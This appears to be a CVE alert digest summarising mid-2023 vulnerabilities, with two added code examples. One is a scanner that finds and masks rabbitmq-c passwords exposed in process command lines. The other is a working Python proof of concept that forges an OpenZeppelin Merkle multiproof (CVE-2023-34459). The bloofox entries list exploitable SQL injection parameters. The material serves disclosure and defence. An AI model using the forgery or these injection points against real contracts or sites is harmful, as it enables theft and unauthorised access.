🚨 CVE-2023-2820
An information disclosure vulnerability in the faye endpoint in Proofpoint Threat Response / Threat Response Auto-Pull (PTR/TRAP) could be used by an attacker on an adjacent network to obtain credentials to integrated services via a man-in-the-middle position or cryptanalysis of the session traffic. An attacker could use these credentials to impersonate PTR/TRAP to these services. All versions prior to 5.10.0 are affected.
Proofpoint US: Proofpoint Threat Response / Threat Response Auto-Pull (PTR/TRAP) Information Disclosure
🚨 CVE-2023-35708
In Progress MOVEit Transfer before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. These are fixed versions of the DLL drop-in: 2020.1.10 (12.1.10), 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3).
🚨 CVE-2023-35790
An issue was discovered in dec_patch_dictionary.cc in libjxl before 0.8.2. An integer underflow in patch decoding can lead to a denial of service, such as an infinite loop.
GitHub: Release v0.8.2 · libjxl/libjxl
Changed
Security: Fix an integer underflow bug in patch decoding (#2551 - CVE-2023-35790).
Note: This release is for evaluation purposes and may contain bugs, including security bugs, that may not...
🚨 CVE-2023-35789
An issue was discovered in the C AMQP client library (aka rabbitmq-c) through 0.13.0 for RabbitMQ. Credentials can only be entered on the command line (e.g., for amqp-publish or amqp-consume) and are thus visible to local attackers by listing a process and its arguments.
GitHub: insecure password option · Issue #575 · alanxz/rabbitmq-c
Hi, the command line tools like amqp-publish and amqp-consume are insecure, since the username/password can be given as a command line parameter either with --password= or as part of the URL given ...
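To turn the issue above into a check you can run on a host, here is an added example (my code, not part of rabbitmq-c). It takes argument vectors in the shape of /proc/<pid>/cmdline, which is what ps prints and which any local user can read on a default Linux proc mount, and reports amqp-* invocations that carry a password either as --password / --password=... or in the userinfo of an amqp:// or amqps:// URL. Only amqp-publish, amqp-consume and the --password= / URL forms come from the issue text; the other tool names in AMQP_TOOLS and the sample command lines are my assumptions.

```python
"""CVE-2023-35789 check: rabbitmq-c CLI tools that carry a password in argv.

Added example, not rabbitmq-c code.  Tool names beyond amqp-publish and
amqp-consume are an assumption; the sample command lines are constructed.
Findings come back with the secret masked so they can be logged safely.
"""
import os
from typing import NamedTuple, Optional
from urllib.parse import urlsplit

AMQP_TOOLS = {"amqp-publish", "amqp-consume", "amqp-get",
              "amqp-declare-queue", "amqp-delete-queue"}
MASK = "******"


class Finding(NamedTuple):
    tool: str
    reasons: tuple
    masked_cmdline: str


def url_password(value: str) -> Optional[str]:
    """Password from the userinfo of an amqp:// or amqps:// URL, else None."""
    if not value.startswith(("amqp://", "amqps://")):
        return None
    return urlsplit(value).password or None


def mask_url(value: str) -> str:
    """Replace the password part of user:password@host with MASK."""
    parts = urlsplit(value)
    userinfo, _, hostport = parts.netloc.rpartition("@")
    user = userinfo.partition(":")[0]
    return parts._replace(netloc=f"{user}:{MASK}@{hostport}").geturl()


def scan_argv(argv) -> Optional[Finding]:
    """Inspect one argument vector; None if not an amqp-* tool or no secret present."""
    if not argv or os.path.basename(argv[0]) not in AMQP_TOOLS:
        return None
    masked, reasons = list(argv), []
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg == "--password" and i + 1 < len(argv):
            masked[i + 1] = MASK
            reasons.append("--password argument")
            i += 2
            continue
        if arg.startswith("--password="):
            masked[i] = "--password=" + MASK
            reasons.append("--password= argument")
        else:
            # The URL is its own argument (after --url / -u) or the value of --url=...
            opt, sep, value = arg.partition("=") if arg.startswith("--") else ("", "", arg)
            if url_password(value):
                masked[i] = opt + sep + mask_url(value)
                reasons.append("password in AMQP URL")
        i += 1
    if not reasons:
        return None
    return Finding(os.path.basename(argv[0]), tuple(reasons), " ".join(masked))


def scan_proc(proc_root="/proc"):
    """Scan live Linux processes; /proc/<pid>/cmdline is NUL separated."""
    findings = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        try:
            with open(os.path.join(proc_root, pid, "cmdline"), "rb") as fh:
                raw = fh.read()
        except OSError:
            continue
        argv = [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]
        finding = scan_argv(argv)
        if finding:
            findings.append((int(pid), finding))
    return findings


# Constructed sample of what `ps -eo args` might show; not captured from a real host.
SAMPLE_CMDLINES = [
    ["amqp-publish", "--url=amqp://app:s3cret@broker.internal:5672/", "-r", "jobs"],
    ["/usr/local/bin/amqp-consume", "--server", "broker.internal", "--username", "app",
     "--password", "hunter2", "-q", "jobs", "cat"],
    ["amqp-consume", "--url", "amqps://broker.internal/", "-q", "jobs", "cat"],  # no secret
    ["/usr/sbin/sshd", "-D"],
]


def scan_samples():
    """Findings for the constructed sample; two of the four lines expose a password."""
    return [f for f in map(scan_argv, SAMPLE_CMDLINES) if f]
```

Run scan_proc() as an unprivileged user to see exactly what the CVE exposes; the findings are masked so they can go into a ticket or SIEM without copying the secret again. The issue text says the tools offer no other way to supply the password, so treat a hit as a credential that every local user has already been able to read, and rotate it rather than just tidying the invocation.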
🚨 CVE-2023-35788
An issue was discovered in fl_set_geneve_opt in net/sched/cls_flower.c in the Linux kernel before 6.3.7. It allows an out-of-bounds write in the flower classifier code via TCA_FLOWER_KEY_ENC_OPTS_GENEVE packets. This may result in denial of service or privilege escalation.
🚨 CVE-2023-33438
A stored Cross-site scripting (XSS) vulnerability in Wolters Kluwer TeamMate+ 35.0.11.0 allows remote attackers to inject arbitrary web script or HTML.
GitHub: CVEs/CVE-2023-33438/README.md at main · justas-dee/CVEs
🚨 CVE-2023-30905
The MC990 X and UV300 RMC component has an inadequate default configuration that could be exploited to obtain enhanced privilege.
🚨 CVE-2023-30904
A security vulnerability in HPE Insight Remote Support may result in the local disclosure of privileged LDAP information.
🚨 CVE-2023-30903
HP-UX could be exploited locally to create a Denial of Service (DoS) when any physical interface is configured with IPv6/inet6.
🚨 CVE-2023-34459
OpenZeppelin Contracts is a library for smart contract development. Starting in version 4.7.0 and prior to version 4.9.2, when the `verifyMultiProof`, `verifyMultiProofCalldata`, `processMultiProof`, or `processMultiProofCalldata` functions are in use, it is possible to construct merkle trees that allow forging a valid multiproof for an arbitrary set of leaves.
A contract may be vulnerable if it uses multiproofs for verification and the merkle tree that is processed includes a node with value 0 at depth 1 (just under the root). This could happen inadvertently for balanced trees with 3 leaves or less, if the leaves are not hashed. This could happen deliberately if a malicious tree builder includes such a node in the tree.
A contract is not vulnerable if it uses single-leaf proving (`verify`, `verifyCalldata`, `processProof`, or `processProofCalldata`), or if it uses multiproofs with a known tree that has hashed leaves. Standard merkle trees produced or validated with the @openzeppelin/merkle-tree library are safe.
The problem has been patched in version 4.9.2.
Some workarounds are available. For those using multiproofs: when constructing merkle trees, hash the leaves and do not insert empty nodes in your trees. Using the @openzeppelin/merkle-tree package eliminates this issue. Do not accept user-provided merkle roots without reconstructing at least the first level of the tree. Verify the merkle tree structure by reconstructing it from the leaves.
GitHub: Merge pull request from GHSA-wprv-93r4-jj2p · OpenZeppelin/openzeppelin-contracts@4d2383e
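The forgery the advisory describes, worked through as an added example (this is my Python model, not OpenZeppelin's Solidity). process_multi_proof mirrors the loop in MerkleProof.processMultiProof: leaves, previously computed hashes and proof elements are consumed in order under the control of the proof flags, and the intermediate hashes live in an array that starts out all zeros, like a fresh bytes32[] in Solidity. With check_proof_consumed=False it behaves like 4.7.0 through 4.9.1; with True it applies the check added in 4.9.2, that every proof element has been consumed. forge_multiproof builds a (proof, flags, leaves) triple that the unpatched loop accepts for any leaves you like against a root whose depth-1 sibling is the zero node: the flags make the loop read scratch slots before they have been written, so the phantom zero stands in for the real empty node. Assumptions: SHA3-256 from hashlib replaces keccak256 (the forgery does not depend on the hash function), and the sample tree and the attacker's leaves are constructed.

```python
"""CVE-2023-34459 worked example: forging a Merkle multiproof against a tree
with a zero node at depth 1 (added example, not OpenZeppelin code).

Assumption: SHA3-256 stands in for keccak256; the forgery relies only on the
sorted pair hash and on the zero-initialised scratch array, not on the hash.
"""
import hashlib

ZERO = b"\x00" * 32


def hash_pair(a: bytes, b: bytes) -> bytes:
    """Commutative pair hash like OpenZeppelin's _hashPair: sort, then hash."""
    lo, hi = (a, b) if a < b else (b, a)
    return hashlib.sha3_256(lo + hi).digest()


def process_multi_proof(proof, proof_flags, leaves, *, check_proof_consumed):
    """Model of MerkleProof.processMultiProof.

    check_proof_consumed=False reproduces 4.7.0 - 4.9.1; True adds the 4.9.2
    check that every proof element was read.  `hashes` starts as all zeros:
    reading a slot before the loop has written it yields a phantom zero node.
    """
    leaves_len, proof_len, total = len(leaves), len(proof), len(proof_flags)
    if leaves_len + proof_len != total + 1:
        raise ValueError("invalid multiproof: length mismatch")
    hashes = [ZERO] * total
    leaf_pos = hash_pos = proof_pos = 0

    def next_node():
        nonlocal leaf_pos, hash_pos
        if leaf_pos < leaves_len:
            leaf_pos += 1
            return leaves[leaf_pos - 1]
        hash_pos += 1  # may point at hashes[i] before iteration i has written it
        return hashes[hash_pos - 1]

    for i in range(total):
        a = next_node()
        if proof_flags[i]:
            b = next_node()
        else:
            b = proof[proof_pos]
            proof_pos += 1
        hashes[i] = hash_pair(a, b)

    if total > 0:
        if check_proof_consumed and proof_pos != proof_len:
            raise ValueError("invalid multiproof: unused proof elements")
        return hashes[-1]
    return leaves[0] if leaves_len > 0 else proof[0]


def verify_multi_proof(proof, proof_flags, root, leaves, *, check_proof_consumed):
    """True if the recomputed root matches; IndexError plays the role of a revert."""
    try:
        got = process_multi_proof(proof, proof_flags, leaves,
                                  check_proof_consumed=check_proof_consumed)
    except (ValueError, IndexError):
        return False
    return got == root


def forge_multiproof(target_leaves, depth1_sibling):
    """Forge a multiproof for arbitrary leaves against root == hash_pair(depth1_sibling, ZERO).

    n leaves, n True flags, one False flag: the True flags fold the leaves
    together and then pair the result with a scratch slot not yet written (a
    phantom zero); the final False flag hashes another phantom zero with the
    real depth-1 node, which is exactly the root.  The second proof element is
    never read; it only satisfies the length check.
    """
    n = len(target_leaves)
    proof = [depth1_sibling, b"\xff" * 32]  # second element is filler
    flags = [True] * n + [False]
    return proof, flags, list(target_leaves)


# Constructed sample tree: two raw (unhashed) leaves under the left depth-1
# node and an empty node a careless builder left as the right depth-1 node.
L0, L1 = b"\x01" * 32, b"\x02" * 32
LEFT = hash_pair(L0, L1)
ROOT = hash_pair(LEFT, ZERO)

# Attacker-chosen leaves that never appeared in the tree.
FORGED_LEAVES = [b"\xaa" * 32, b"\xbb" * 32, b"\xcc" * 32]


def demo():
    """(legit proof accepted, forgery accepted by <=4.9.1, forgery accepted by 4.9.2)."""
    proof, flags, leaves = forge_multiproof(FORGED_LEAVES, LEFT)
    return (
        verify_multi_proof([ZERO], [True, False], ROOT, [L0, L1], check_proof_consumed=True),
        verify_multi_proof(proof, flags, ROOT, leaves, check_proof_consumed=False),
        verify_multi_proof(proof, flags, ROOT, leaves, check_proof_consumed=True),
    )
```

The model also shows why the advisory's workarounds help: hashing the leaves (the @openzeppelin/merkle-tree package hashes them) and refusing empty nodes means no honest tree has ZERO directly under the root, so hash_pair(sibling, ZERO) is never a root the contract accepts, and rebuilding at least the first level from the leaves yourself catches a builder that inserted such a node deliberately.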
🚨 CVE-2023-3295
The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the file manager functionality in versions up to, and including, 1.5.66. This makes it possible for authenticated attackers with contributor-level permissions and above to upload arbitrary files to the affected site's server, which may make remote code execution possible. The issue was partially patched in version 1.5.66 and fully patched in 1.5.67.
🚨 CVE-2023-34756
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.
cyb: bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerabilities
Vendor Homepage: bloofoxCMS - Home
Version: 0.5.2.1
Tested On: macOS, review of source code
Affected Page:
admin/index.php?mode=settings&page=projects&action=edit [Parameter cid]
admin/index.php?mode=settings&page=plugins&action=edit [Parameter pid]
admi...
🚨 CVE-2023-34755
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit.
cyb: bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerabilities (same advisory as linked under CVE-2023-34756)
🚨 CVE-2023-34753
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.
cyb: bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerabilities (same advisory as linked under CVE-2023-34756)
🚨 CVE-2023-34752
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.
🚨 CVE-2023-34751
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.
cyb: bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerabilities (same advisory as linked under CVE-2023-34756)
🚨 CVE-2023-34754
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the pid parameter at admin/index.php?mode=settings&page=plugins&action=edit.
cyb: bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerabilities (same advisory as linked under CVE-2023-34756)
🚨 CVE-2023-34750
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=projects&action=edit.
cyb: bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerabilities (same advisory as linked under CVE-2023-34756)
🚨 CVE-2023-3230
Missing Authorization in GitHub repository fossbilling/fossbilling prior to 0.5.0.